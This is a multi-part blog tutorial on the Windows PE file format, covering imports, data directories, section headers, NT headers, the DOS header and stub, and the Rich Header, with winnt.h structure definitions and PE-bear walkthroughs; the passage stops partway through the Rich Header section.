When discussing IMAGE_IMPORT_DESCRIPTOR.TimeDateStamp, I mentioned that in case of a bound import, the time date stamp is set to -1 and the real time date stamp of the DLL can be found in the corresponding IMAGE_BOUND_IMPORT_DESCRIPTOR in the Bound Import Data Directory.

Bound Import Data Directory

The Bound Import Data Directory is similar to the Import Directory Table, however as the name suggests, it holds information about the bound imports.

It consists of an array of IMAGE_BOUND_IMPORT_DESCRIPTOR structures, and ends with a zeroed-out IMAGE_BOUND_IMPORT_DESCRIPTOR.

IMAGE_BOUND_IMPORT_DESCRIPTOR is defined as follows:

typedef struct _IMAGE_BOUND_IMPORT_DESCRIPTOR {
    DWORD   TimeDateStamp;
    WORD    OffsetModuleName;
    WORD    NumberOfModuleForwarderRefs;
// Array of zero or more IMAGE_BOUND_FORWARDER_REF follows
} IMAGE_BOUND_IMPORT_DESCRIPTOR,  *PIMAGE_BOUND_IMPORT_DESCRIPTOR;
  • TimeDateStamp: The time date stamp of the imported DLL.
  • OffsetModuleName: An offset to a string with the name of the imported DLL.
    It’s an offset from the first IMAGE_BOUND_IMPORT_DESCRIPTOR
  • NumberOfModuleForwarderRefs: The number of the IMAGE_BOUND_FORWARDER_REF structures that immediately follow this structure.
    IMAGE_BOUND_FORWARDER_REF is a structure that’s identical to IMAGE_BOUND_IMPORT_DESCRIPTOR, the only difference is that the last member is reserved.

That’s all we need to know about bound imports.


Import Lookup Table (ILT)

Sometimes people refer to it as the Import Name Table (INT).

Every imported DLL has an Import Lookup Table.
IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk holds the RVA of the ILT of the corresponding DLL.

The ILT is essentially a table of names or references, it tells the loader which functions are needed from the imported DLL.

The ILT consists of an array of 32-bit numbers (for PE32) or 64-bit numbers for (PE32+), the last one is zeroed-out to indicate the end of the ILT.

Each entry of these entries encodes information as follows:

  • Bit 31/63 (most significant bit): This is called the Ordinal/Name flag, it specifies whether to import the function by name or by ordinal.
  • Bits 15-0: If the Ordinal/Name flag is set to 1 these bits are used to hold the 16-bit ordinal number that will be used to import the function, bits 30-15/62-15 for PE32/PE32+ must be set to 0.
  • Bits 30-0: If the Ordinal/Name flag is set to 0 these bits are used to hold an RVA of a Hint/Name table.

Hint/Name Table

A Hint/Name table is a structure defined in winnt.h as IMAGE_IMPORT_BY_NAME:

typedef struct _IMAGE_IMPORT_BY_NAME {
    WORD    Hint;
    CHAR   Name[1];
} IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME;
  • Hint: A word that contains a number, this number is used to look-up the function, that number is first used as an index into the export name pointer table, if that initial check fails a binary search is performed on the DLL’s export name pointer table.
  • Name: A null-terminated string that contains the name of the function to import.

Import Address Table (IAT)

On disk, the IAT is identical to the ILT, however during bounding when the binary is being loaded into memory, the entries of the IAT get overwritten with the addresses of the functions that are being imported.


Summary

So to summarize what we discussed in this post, for every DLL the executable is loading functions from, there will be an IMAGE_IMPORT_DESCRIPTOR within the Image Directory Table.
The IMAGE_IMPORT_DESCRIPTOR will contain the name of the DLL, and two fields holding RVAs of the ILT and the IAT.
The ILT will contain references for all the functions that are being imported from the DLL.
The IAT will be identical to the ILT until the executable is loaded in memory, then the loader will fill the IAT with the actual addresses of the imported functions.
If the DLL import is a bound import, then the import information will be contained in IMAGE_BOUND_IMPORT_DESCRIPTOR structures in a separate Data Directory called the Bound Import Data Directory.

Let’s take a quick look at the import information inside of an actual PE file.

Here’s the Import Directory Table of the executable:

All of these entries are IMAGE_IMPORT_DESCRIPTORs.

As you can see, the TimeDateStamp of all the imports is set to 0, meaning that none of these imports are bound, this is also confirmed in the Bound? column added by PE-bear.

For example, if we take USER32.dll and follow the RVA of its ILT (referenced by OriginalFirstThunk), we’ll find only 1 entry (because only one function is imported), and that entry looks like this:

This is a 64-bit executable, so the entry is 64 bits long.
As you can see, the last byte is set to 0, indicating that a Hint/Table name should be used to look-up the function.
We know that the RVA of this Hint/Table name should be referenced by the first 2 bytes, so we should follow RVA 0x29F8:

Now we’re looking at an IMAGE_IMPORT_BY_NAME structure, first two bytes hold the hint, which in this case is 0x283, the rest of the structure holds the full name of the function which is MessageBoxA.
We can verify that our interpretation of the data is correct by looking at how PE-bear parsed it, and we’ll see the same results:


Conclusion

That’s all I have to say about PE imports, in the next post I’ll discuss PE base relocations.
Thanks for reading.

A dive into the PE file format - PE file structure - Part 4: Data Directories, Section Headers and Sections

By: 0xRick
27 October 2021 at 01:00

A dive into the PE file format - PE file structure - Part 4: Data Directories, Section Headers and Sections

Introduction

In the last post we talked about the NT Headers and we skipped the last part of the Optional Header which was the data directories.

In this post we’re going to talk about what data directories are and where they are located.
We’re also going to cover section headers and sections in this post.


Data Directories

The last member of the IMAGE_OPTIONAL_HEADER structure was an array of IMAGE_DATA_DIRECTORY structures defined as follows:

IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];

IMAGE_NUMBEROF_DIRECTORY_ENTRIES is a constant defined with the value 16, meaning that this array can have up to 16 IMAGE_DATA_DIRECTORY entries:

#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES    16

An IMAGE_DATA_DIRETORY structure is defines as follows:

typedef struct _IMAGE_DATA_DIRECTORY {
    DWORD   VirtualAddress;
    DWORD   Size;
} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;

It’s a very simple structure with only two members, first one being an RVA pointing to the start of the Data Directory and the second one being the size of the Data Directory.

So what is a Data Directory? Basically a Data Directory is a piece of data located within one of the sections of the PE file.
Data Directories contain useful information needed by the loader, an example of a very important directory is the Import Directory which contains a list of external functions imported from other libraries, we’ll discuss it in more detail when we go over PE imports.

Please note that not all Data Directories have the same structure, the IMAGE_DATA_DIRECTORY.VirtualAddress points to the Data Directory, however the type of that directory is what determines how that chunk of data is going to be parsed.

Here’s a list of Data Directories defined in winnt.h. (Each one of these values represents an index in the DataDirectory array):

// Directory Entries

#define IMAGE_DIRECTORY_ENTRY_EXPORT          0   // Export Directory
#define IMAGE_DIRECTORY_ENTRY_IMPORT          1   // Import Directory
#define IMAGE_DIRECTORY_ENTRY_RESOURCE        2   // Resource Directory
#define IMAGE_DIRECTORY_ENTRY_EXCEPTION       3   // Exception Directory
#define IMAGE_DIRECTORY_ENTRY_SECURITY        4   // Security Directory
#define IMAGE_DIRECTORY_ENTRY_BASERELOC       5   // Base Relocation Table
#define IMAGE_DIRECTORY_ENTRY_DEBUG           6   // Debug Directory
//      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       7   // (X86 usage)
#define IMAGE_DIRECTORY_ENTRY_ARCHITECTURE    7   // Architecture Specific Data
#define IMAGE_DIRECTORY_ENTRY_GLOBALPTR       8   // RVA of GP
#define IMAGE_DIRECTORY_ENTRY_TLS             9   // TLS Directory
#define IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    10   // Load Configuration Directory
#define IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   11   // Bound Import Directory in headers
#define IMAGE_DIRECTORY_ENTRY_IAT            12   // Import Address Table
#define IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   13   // Delay Load Import Descriptors
#define IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 14   // COM Runtime descriptor

If we take a look at the contents of IMAGE_OPTIONAL_HEADER.DataDirectory of an actual PE file, we might see entries where both fields are set to 0:

This means that this specific Data Directory is not used (doesn’t exist) in the executable file.


Sections and Section Headers

Sections

Sections are the containers of the actual data of the executable file, they occupy the rest of the PE file after the headers, precisely after the section headers.
Some sections have special names that indicate their purpose, we’ll go over some of them, and a full list of these names can be found on the official Microsoft documentation under the “Special Sections” section.

  • .text: Contains the executable code of the program.
  • .data: Contains the initialized data.
  • .bss: Contains uninitialized data.
  • .rdata: Contains read-only initialized data.
  • .edata: Contains the export tables.
  • .idata: Contains the import tables.
  • .reloc: Contains image relocation information.
  • .rsrc: Contains resources used by the program, these include images, icons or even embedded binaries.
  • .tls: (Thread Local Storage), provides storage for every executing thread of the program.

Section Headers

After the Optional Header and before the sections comes the Section Headers. These headers contain information about the sections of the PE file.

A Section Header is a structure named IMAGE_SECTION_HEADER defined in winnt.h as follows:

typedef struct _IMAGE_SECTION_HEADER {
    BYTE    Name[IMAGE_SIZEOF_SHORT_NAME];
    union {
            DWORD   PhysicalAddress;
            DWORD   VirtualSize;
    } Misc;
    DWORD   VirtualAddress;
    DWORD   SizeOfRawData;
    DWORD   PointerToRawData;
    DWORD   PointerToRelocations;
    DWORD   PointerToLinenumbers;
    WORD    NumberOfRelocations;
    WORD    NumberOfLinenumbers;
    DWORD   Characteristics;
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;
  • Name: First field of the Section Header, a byte array of the size IMAGE_SIZEOF_SHORT_NAME that holds the name of the section. IMAGE_SIZEOF_SHORT_NAME has the value of 8 meaning that a section name can’t be longer than 8 characters. For longer names the official documentation mentions a work-around by filling this field with an offset in the string table, however executable images do not use a string table so this limitation of 8 characters holds for executable images.
  • PhysicalAddress or VirtualSize: A union defines multiple names for the same thing, this field contains the total size of the section when it’s loaded in memory.
  • VirtualAddress: The documentation states that for executable images this field holds the address of the first byte of the section relative to the image base when loaded in memory, and for object files it holds the address of the first byte of the section before relocation is applied.
  • SizeOfRawData: This field contains the size of the section on disk, it must be a multiple of IMAGE_OPTIONAL_HEADER.FileAlignment.
    SizeOfRawData and VirtualSize can be different, we’ll discuss the reason for this later in the post.
  • PointerToRawData: A pointer to the first page of the section within the file, for executable images it must be a multiple of IMAGE_OPTIONAL_HEADER.FileAlignment.
  • PointerToRelocations: A file pointer to the beginning of relocation entries for the section. It’s set to 0 for executable files.
  • PointerToLineNumbers: A file pointer to the beginning of COFF line-number entries for the section. It’s set to 0 because COFF debugging information is deprecated.
  • NumberOfRelocations: The number of relocation entries for the section, it’s set to 0 for executable images.
  • NumberOfLinenumbers: The number of COFF line-number entries for the section, it’s set to 0 because COFF debugging information is deprecated.
  • Characteristics: Flags that describe the characteristics of the section.
    These characteristics are things like if the section contains executable code, contains initialized/uninitialized data, can be shared in memory.
    A complete list of section characteristics flags can be found on the official Microsoft documentation.

SizeOfRawData and VirtualSize can be different, and this can happen for multiple of reasons.

SizeOfRawData must be a multiple of IMAGE_OPTIONAL_HEADER.FileAlignment, so if the section size is less than that value the rest gets padded and SizeOfRawData gets rounded to the nearest multiple of IMAGE_OPTIONAL_HEADER.FileAlignment.
However when the section is loaded into memory it doesn’t follow that alignment and only the actual size of the section is occupied.
In this case SizeOfRawData will be greater than VirtualSize

The opposite can happen as well.
If the section contains uninitialized data, these data won’t be accounted for on disk, but when the section gets mapped into memory, the section will expand to reserve memory space for when the uninitialized data gets later initialized and used.
This means that the section on disk will occupy less than it will do in memory, in this case VirtualSize will be greater than SizeOfRawData.

Here’s the view of Section Headers in PE-bear:

We can see Raw Addr. and Virtual Addr. fields which correspond to IMAGE_SECTION_HEADER.PointerToRawData and IMAGE_SECTION_HEADER.VirtualAddress.

Raw Size and Virtual Size correspond to IMAGE_SECTION_HEADER.SizeOfRawData and IMAGE_SECTION_HEADER.VirtualSize.
We can see how these two fields are used to calculate where the section ends, both on disk and in memory.
For example if we take the .text section, it has a raw address of 0x400 and a raw size of 0xE00, if we add them together we get 0x1200 which is displayed as the section end on disk.
Similarly we can do the same with virtual size and address, virtual address is 0x1000 and virtual size is 0xD2C, if we add them together we get 0x1D2C.

The Characteristics field marks some sections as read-only, some other sections as read-write and some sections as readable and executable.

PointerToRelocations, NumberOfRelocations and NumberOfLinenumbers are set to 0 as expected.


Conclusion

That’s it for this post, we’ve discussed what Data Directories are and we talked about sections.
The next post will be about PE imports.
Thanks for reading.

A dive into the PE file format - PE file structure - Part 3: NT Headers

By: 0xRick
24 October 2021 at 01:00

A dive into the PE file format - PE file structure - Part 3: NT Headers

Introduction

In the previous post we looked at the structure of the DOS header and we reversed the DOS stub.

In this post we’re going to talk about the NT Headers part of the PE file structure.

Before we get into the post, we need to talk about an important concept that we’re going to see a lot, and that is the concept of a Relative Virtual Address or an RVA. An RVA is just an offset from where the image was loaded in memory (the Image Base). So to translate an RVA into an absolute virtual address you need to add the value of the RVA to the value of the Image Base. PE files rely heavily on the use of RVAs as we’ll see later.


NT Headers (IMAGE_NT_HEADERS)

NT headers is a structure defined in winnt.h as IMAGE_NT_HEADERS, by looking at its definition we can see that it has three members, a DWORD signature, an IMAGE_FILE_HEADER structure called FileHeader and an IMAGE_OPTIONAL_HEADER structure called OptionalHeader.
It’s worth mentioning that this structure is defined in two different versions, one for 32-bit executables (Also named PE32 executables) named IMAGE_NT_HEADERS and one for 64-bit executables (Also named PE32+ executables) named IMAGE_NT_HEADERS64.
The main difference between the two versions is the used version of IMAGE_OPTIONAL_HEADER structure which has two versions, IMAGE_OPTIONAL_HEADER32 for 32-bit executables and IMAGE_OPTIONAL_HEADER64 for 64-bit executables.

typedef struct _IMAGE_NT_HEADERS64 {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

typedef struct _IMAGE_NT_HEADERS {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32;

Signature

First member of the NT headers structure is the PE signature, it’s a DWORD which means that it occupies 4 bytes.
It always has a fixed value of 0x50450000 which translates to PE\0\0 in ASCII.

Here’s a screenshot from PE-bear showing the PE signature:

File Header (IMAGE_FILE_HEADER)

Also called “The COFF File Header”, the File Header is a structure that holds some information about the PE file.
It’s defined as IMAGE_FILE_HEADER in winnt.h, here’s the definition:

typedef struct _IMAGE_FILE_HEADER {
    WORD    Machine;
    WORD    NumberOfSections;
    DWORD   TimeDateStamp;
    DWORD   PointerToSymbolTable;
    DWORD   NumberOfSymbols;
    WORD    SizeOfOptionalHeader;
    WORD    Characteristics;
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;

It’s a simple structure with 7 members:

  • Machine: This is a number that indicates the type of machine (CPU Architecture) the executable is targeting, this field can have a lot of values, but we’re only interested in two of them, 0x8864 for AMD64 and 0x14c for i386. For a complete list of possible values you can check the official Microsoft documentation.
  • NumberOfSections: This field holds the number of sections (or the number of section headers aka. the size of the section table.).
  • TimeDateStamp: A unix timestamp that indicates when the file was created.
  • PointerToSymbolTable and NumberOfSymbols: These two fields hold the file offset to the COFF symbol table and the number of entries in that symbol table, however they get set to 0 which means that no COFF symbol table is present, this is done because the COFF debugging information is deprecated.
  • SizeOfOptionalHeader: The size of the Optional Header.
  • Characteristics: A flag that indicates the attributes of the file, these attributes can be things like the file being executable, the file being a system file and not a user program, and a lot of other things. A complete list of these flags can be found on the official Microsoft documentation.

Here’s the File Header contents of an actual PE file:

Optional Header (IMAGE_OPTIONAL_HEADER)

The Optional Header is the most important header of the NT headers, the PE loader looks for specific information provided by that header to be able to load and run the executable.
It’s called the optional header because some file types like object files don’t have it, however this header is essential for image files.
It doesn’t have a fixed size, that’s why the IMAGE_FILE_HEADER.SizeOfOptionalHeader member exists.

The first 8 members of the Optional Header structure are standard for every implementation of the COFF file format, the rest of the header is an extension to the standard COFF optional header defined by Microsoft, these additional members of the structure are needed by the Windows PE loader and linker.

As mentioned earlier, there are two versions of the Optional Header, one for 32-bit executables and one for 64-bit executables.
The two versions are different in two aspects:

  • The size of the structure itself (or the number of members defined within the structure): IMAGE_OPTIONAL_HEADER32 has 31 members while IMAGE_OPTIONAL_HEADER64 only has 30 members, that additional member in the 32-bit version is a DWORD named BaseOfData which holds an RVA of the beginning of the data section.
  • The data type of some of the members: The following 5 members of the Optional Header structure are defined as DWORD in the 32-bit version and as ULONGLONG in the 64-bit version:
    • ImageBase
    • SizeOfStackReserve
    • SizeOfStackCommit
    • SizeOfHeapReserve
    • SizeOfHeapCommit

Let’s take a look at the definition of both structures.

typedef struct _IMAGE_OPTIONAL_HEADER {
    //
    // Standard fields.
    //

    WORD    Magic;
    BYTE    MajorLinkerVersion;
    BYTE    MinorLinkerVersion;
    DWORD   SizeOfCode;
    DWORD   SizeOfInitializedData;
    DWORD   SizeOfUninitializedData;
    DWORD   AddressOfEntryPoint;
    DWORD   BaseOfCode;
    DWORD   BaseOfData;

    //
    // NT additional fields.
    //

    DWORD   ImageBase;
    DWORD   SectionAlignment;
    DWORD   FileAlignment;
    WORD    MajorOperatingSystemVersion;
    WORD    MinorOperatingSystemVersion;
    WORD    MajorImageVersion;
    WORD    MinorImageVersion;
    WORD    MajorSubsystemVersion;
    WORD    MinorSubsystemVersion;
    DWORD   Win32VersionValue;
    DWORD   SizeOfImage;
    DWORD   SizeOfHeaders;
    DWORD   CheckSum;
    WORD    Subsystem;
    WORD    DllCharacteristics;
    DWORD   SizeOfStackReserve;
    DWORD   SizeOfStackCommit;
    DWORD   SizeOfHeapReserve;
    DWORD   SizeOfHeapCommit;
    DWORD   LoaderFlags;
    DWORD   NumberOfRvaAndSizes;
    IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32;
typedef struct _IMAGE_OPTIONAL_HEADER64 {
    WORD        Magic;
    BYTE        MajorLinkerVersion;
    BYTE        MinorLinkerVersion;
    DWORD       SizeOfCode;
    DWORD       SizeOfInitializedData;
    DWORD       SizeOfUninitializedData;
    DWORD       AddressOfEntryPoint;
    DWORD       BaseOfCode;
    ULONGLONG   ImageBase;
    DWORD       SectionAlignment;
    DWORD       FileAlignment;
    WORD        MajorOperatingSystemVersion;
    WORD        MinorOperatingSystemVersion;
    WORD        MajorImageVersion;
    WORD        MinorImageVersion;
    WORD        MajorSubsystemVersion;
    WORD        MinorSubsystemVersion;
    DWORD       Win32VersionValue;
    DWORD       SizeOfImage;
    DWORD       SizeOfHeaders;
    DWORD       CheckSum;
    WORD        Subsystem;
    WORD        DllCharacteristics;
    ULONGLONG   SizeOfStackReserve;
    ULONGLONG   SizeOfStackCommit;
    ULONGLONG   SizeOfHeapReserve;
    ULONGLONG   SizeOfHeapCommit;
    DWORD       LoaderFlags;
    DWORD       NumberOfRvaAndSizes;
    IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64;
  • Magic: Microsoft documentation describes this field as an integer that identifies the state of the image, the documentation mentions three common values:

    • 0x10B: Identifies the image as a PE32 executable.
    • 0x20B: Identifies the image as a PE32+ executable.
    • 0x107: Identifies the image as a ROM image.

    The value of this field is what determines whether the executable is 32-bit or 64-bit, IMAGE_FILE_HEADER.Machine is ignored by the Windows PE loader.

  • MajorLinkerVersion and MinorLinkerVersion: The linker major and minor version numbers.

  • SizeOfCode: This field holds the size of the code (.text) section, or the sum of all code sections if there are multiple sections.

  • SizeOfInitializedData: This field holds the size of the initialized data (.data) section, or the sum of all initialized data sections if there are multiple sections.

  • SizeOfUninitializedData: This field holds the size of the uninitialized data (.bss) section, or the sum of all uninitialized data sections if there are multiple sections.

  • AddressOfEntryPoint: An RVA of the entry point when the file is loaded into memory. The documentation states that for program images this relative address points to the starting address and for device drivers it points to initialization function. For DLLs an entry point is optional, and in the case of entry point absence the AddressOfEntryPoint field is set to 0.

  • BaseOfCode: An RVA of the start of the code section when the file is loaded into memory.

  • BaseOfData (PE32 Only): An RVA of the start of the data section when the file is loaded into memory.

  • ImageBase: This field holds the preferred address of the first byte of image when loaded into memory (the preferred base address), this value must be a multiple of 64K. Due to memory protections like ASLR, and a lot of other reasons, the address specified by this field is almost never used, in this case the PE loader chooses an unused memory range to load the image into, after loading the image into that address the loader goes into a process called the relocating where it fixes the constant addresses within the image to work with the new image base, there’s a special section that holds information about places that will need fixing if relocation is needed, that section is called the relocation section (.reloc), more on that in the upcoming posts.

  • SectionAlignment: This field holds a value that gets used for section alignment in memory (in bytes), sections are aligned in memory boundaries that are multiples of this value. The documentation states that this value defaults to the page size for the architecture and it can’t be less than the value of FileAlignment.

  • FileAlignment: Similar to SectionAligment this field holds a value that gets used for section raw data alignment on disk (in bytes), if the size of the actual data in a section is less than the FileAlignment value, the rest of the chunk gets padded with zeroes to keep the alignment boundaries. The documentation states that this value should be a power of 2 between 512 and 64K, and if the value of SectionAlignment is less than the architecture’s page size then the sizes of FileAlignment and SectionAlignment must match.

  • MajorOperatingSystemVersion, MinorOperatingSystemVersion, MajorImageVersion, MinorImageVersion, MajorSubsystemVersion and MinorSubsystemVersion: These members of the structure specify the major version number of the required operating system, the minor version number of the required operating system, the major version number of the image, the minor version number of the image, the major version number of the subsystem and the minor version number of the subsystem respectively.

  • Win32VersionValue: A reserved field that the documentation says should be set to 0.

  • SizeOfImage: The size of the image file (in bytes), including all headers. It gets rounded up to a multiple of SectionAlignment because this value is used when loading the image into memory.

  • SizeOfHeaders: The combined size of the DOS stub, PE header (NT Headers), and section headers rounded up to a multiple of FileAlignment.

  • CheckSum: A checksum of the image file, it’s used to validate the image at load time.

  • Subsystem: This field specifies the Windows subsystem (if any) that is required to run the image, A complete list of the possible values of this field can be found on the official Microsoft documentation.

  • DLLCharacteristics: This field defines some characteristics of the executable image file, like if it’s NX compatible and if it can be relocated at run time. I have no idea why it’s named DLLCharacteristics, it exists within normal executable image files and it defines characteristics that can apply to normal executable files. A complete list of the possible flags for DLLCharacteristics can be found on the official Microsoft documentation.

  • SizeOfStackReserve, SizeOfStackCommit, SizeOfHeapReserve and SizeOfHeapCommit: These fields specify the size of the stack to reserve, the size of the stack to commit, the size of the local heap space to reserve and the size of the local heap space to commit respectively.

  • LoaderFlags: A reserved field that the documentation says should be set to 0.

  • NumberOfRvaAndSizes : Size of the DataDirectory array.

  • DataDirectory: An array of IMAGE_DATA_DIRECTORY structures. We will talk about this in the next post.

Let’s take a look at the Optional Header contents of an actual PE file.

We can talk about some of these fields, first one being the Magic field at the start of the header, it has the value 0x20B meaning that this is a PE32+ executable.

We can see that the entry point RVA is 0x12C4 and the code section start RVA is 0x1000, it follows the alignment defined by the SectionAlignment field which has the value of 0x1000.

File alignment is set to 0x200, and we can verify this by looking at any of the sections, for example the data section:

As you can see, the actual contents of the data section are from 0x2200 to 0x2229, however the rest of the section is padded until 0x23FF to comply with the alignment defined by FileAlignment.

SizeOfImage is set to 7000 and SizeOfHeaders is set to 400, both are multiples of SectionAlignment and FileAlignment respectively.

The Subsystem field is set to 3 which is the Windows console, and that makes sense because the program is a console application.

I didn’t include the DataDirectory in the optional header contents screenshot because we still haven’t talked about it yet.


Conclusion

We’ve reached the end of this post. In summary we looked at the NT Headers structure, and we discussed the File Header and Optional Header structures in detail.
In the next post we will take a look at the Data Directories, the Section Headers, and the sections.
Thanks for reading.

A dive into the PE file format - PE file structure - Part 2: DOS Header, DOS Stub and Rich Header

By: 0xRick
22 October 2021 at 01:02

A dive into the PE file format - PE file structure - Part 2: DOS Header, DOS Stub and Rich Header

Introduction

In the previous post we looked at a high level overview of the PE file structure, in this post we’re going to talk about the first two parts which are the DOS Header and the DOS Stub.

The PE viewer I’m going to use throughout the series is called PE-bear, it’s full of features and has a good UI.


DOS Header

Overview

The DOS header (also called the MS-DOS header) is a 64-byte-long structure that exists at the start of the PE file.
it’s not important for the functionality of PE files on modern Windows systems, however it’s there because of backward compatibility reasons.
This header makes the file an MS-DOS executable, so when it’s loaded on MS-DOS the DOS stub gets executed instead of the actual program.
Without this header, if you attempt to load the executable on MS-DOS it will not be loaded and will just produce a generic error.

Structure

As mentioned before, it’s a 64-byte-long structure, we can take a look at the contents of that structure by looking at the IMAGE_DOS_HEADER structure definition from winnt.h:

typedef struct _IMAGE_DOS_HEADER {      // DOS .EXE header
    WORD   e_magic;                     // Magic number
    WORD   e_cblp;                      // Bytes on last page of file
    WORD   e_cp;                        // Pages in file
    WORD   e_crlc;                      // Relocations
    WORD   e_cparhdr;                   // Size of header in paragraphs
    WORD   e_minalloc;                  // Minimum extra paragraphs needed
    WORD   e_maxalloc;                  // Maximum extra paragraphs needed
    WORD   e_ss;                        // Initial (relative) SS value
    WORD   e_sp;                        // Initial SP value
    WORD   e_csum;                      // Checksum
    WORD   e_ip;                        // Initial IP value
    WORD   e_cs;                        // Initial (relative) CS value
    WORD   e_lfarlc;                    // File address of relocation table
    WORD   e_ovno;                      // Overlay number
    WORD   e_res[4];                    // Reserved words
    WORD   e_oemid;                     // OEM identifier (for e_oeminfo)
    WORD   e_oeminfo;                   // OEM information; e_oemid specific
    WORD   e_res2[10];                  // Reserved words
    LONG   e_lfanew;                    // File address of new exe header
  } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

This structure is important to the PE loader on MS-DOS, however only a few members of it are important to the PE loader on Windows Systems, so we’re not going to cover everything in here, just the important members of the structure.

  • e_magic: This is the first member of the DOS Header, it’s a WORD so it occupies 2 bytes, it’s usually called the magic number. It has a fixed value of 0x5A4D or MZ in ASCII, and it serves as a signature that marks the file as an MS-DOS executable.
  • e_lfanew: This is the last member of the DOS header structure, it’s located at offset 0x3C into the DOS header and it holds an offset to the start of the NT headers. This member is important to the PE loader on Windows systems because it tells the loader where to look for the file header.

The following picture shows contents of the DOS header in an actual PE file using PE-bear:

As you can see, the first member of the header is the magic number with the fixed value we talked about which was 5A4D.
The last member of the header (at offset 0x3C) is given the name “File address of new exe header”, it has the value 100, we can follow to that offset and we’ll find the start of the NT headers as expected:


DOS Stub

Overview

The DOS stub is an MS-DOS program that prints an error message saying that the executable is not compatible with DOS then exits.
This is what gets executed when the program is loaded in MS-DOS, the default error message is “This program cannot be run in DOS mode.”, however this message can be changed by the user during compile time.

That’s all we need to know about the DOS stub, we don’t really care about it, but let’s take a look at what it’s doing just for fun.

Analysis

To be able to disassemble the machine code of the DOS stub, I copied the code of the stub from PE-bear, then I created a new file with the stub contents using a hex editor (HxD) and gave it the name dos-stub.exe.

Stub code:

0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68
69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 
74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 
6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00

After that I used IDA to disassemble the executable, MS-DOS programs are 16-bit programs, so I chose the intel 8086 processor type and the 16-bit disassembly mode.

It’s a fairly simple program, let’s step through it line by line:

seg000:0000                 push    cs
seg000:0001                 pop     ds

First line pushes the value of cs onto the stack and the second line pops that value from the top of stack into ds. This is just a way of setting the value of the data segment to the same value as the code segment.

seg000:0002                 mov     dx, 0Eh
seg000:0005                 mov     ah, 9
seg000:0007                 int     21h             ; DOS - PRINT STRING
seg000:0007                                         ; DS:DX -> string terminated by "$"

These three lines are responsible for printing the error message, first line sets dx to the address of the string “This program cannot be run in DOS mode.” (0xe), second line sets ah to 9 and the last line invokes interrupt 21h.

Interrupt 21h is a DOS interrupt (API call) that can do a lot of things, it takes a parameter that determines what function to execute and that parameter is passed in the ah register.
We see here that the value 9 is given to the interrupt, 9 is the code of the function that prints a string to the screen, that function takes a parameter which is the address of the string to print, that parameter is passed in the dx register as we can see in the code.

Information about the DOS API can be found on wikipedia.

seg000:0009                 mov     ax, 4C01h
seg000:000C                 int     21h             ; DOS - 2+ - QUIT WITH EXIT CODE (EXIT)
seg000:000C                                         ; AL = exit code

The last three lines of the program are again an interrupt 21h call, this time there’s a mov instruction that puts 0X4C01 into ax, this sets al to 0x01 and ah to 0x4c.

0x4c is the function code of the function that exits with an error code, it takes the error code from al, which in this case is 1.

So in summary, all the DOS stub is doing is print the error message then exit with code 1.


Rich Header

So now we’ve seen the DOS Header and the DOS Stub, however there’s still a chunk of data we haven’t talked about lying between the DOS Stub and the start of the NT Headers.

This chunk of data is commonly referred to as the Rich Header, it’s an undocumented structure that’s only present in executables built using the Microsoft Visual Studio toolset.
This structure holds some metadata about the tools used to build the executable like their names or types and their specific versions and build numbers.

All of the resources I have read about PE files didn’t mention this structure, however when searching about the Rich Header itself I found a decent amount of resources, and that makes sense because the Rich Header is not actually a part of the PE file format structure and can be completely zeroed-out without interfering with the executable’s functionality, it’s just something that Microsoft adds to any executable built using their Visual Studio toolset.

I only know about the Rich Header because I’ve read the reports on the Olympic Destroyer malware, and for those who don’t know what Olympic Destroyer is, it’s a malware that was written and used by a threat group in an attempt to disrupt the 2018 Winter Olympics.
This piece of malware is known for having a lot of false flags that were intentionally put to cause confusion and misattribution, one of the false flags present there was a Rich Header.
The authors of the malware overwrote the original Rich Header in the malware executable with the Rich Header of another malware attributed to the Lazarus threat group to make it look like it was Lazarus.
You can check Kaspersky’s report for more information about this.

The Rich Header consists of a chunk of XORed data followed by a signature (Rich) and a 32-bit checksum value that is the XOR key.
The encrypted data consists of a DWORD signature DanS, 3 zeroed-out DWORDs for padding, then pairs of DWORDS each pair representing an entry, and each entry holds a tool name, its build number and the number of times it’s been used.
In each DWORD pair the first pair holds the type ID or the product ID in the high WORD and the build ID in the low WORD, the second pair holds the use count.

PE-bear parses the Rich Header automatically:

As you can see the DanS signature is the first thing in the structure, then there are 3 zeroed-out DWORDs and after that comes the entries.
We can also see the corresponding tools and Visual Studio versions of the product and build IDs.

As an exercise I wrote a script to parse this header myself, it’s a very simple process, all we need to do is to XOR the data, then read the entry pairs and translate them.

Rich Header data:

7E 13 87 AA 3A 72 E9 F9 3A 72 E9 F9 3A 72 E9 F9
33 0A 7A F9 30 72 E9 F9 F1 1D E8 F8 38 72 E9 F9 
F1 1D EC F8 2B 72 E9 F9 F1 1D ED F8 30 72 E9 F9 
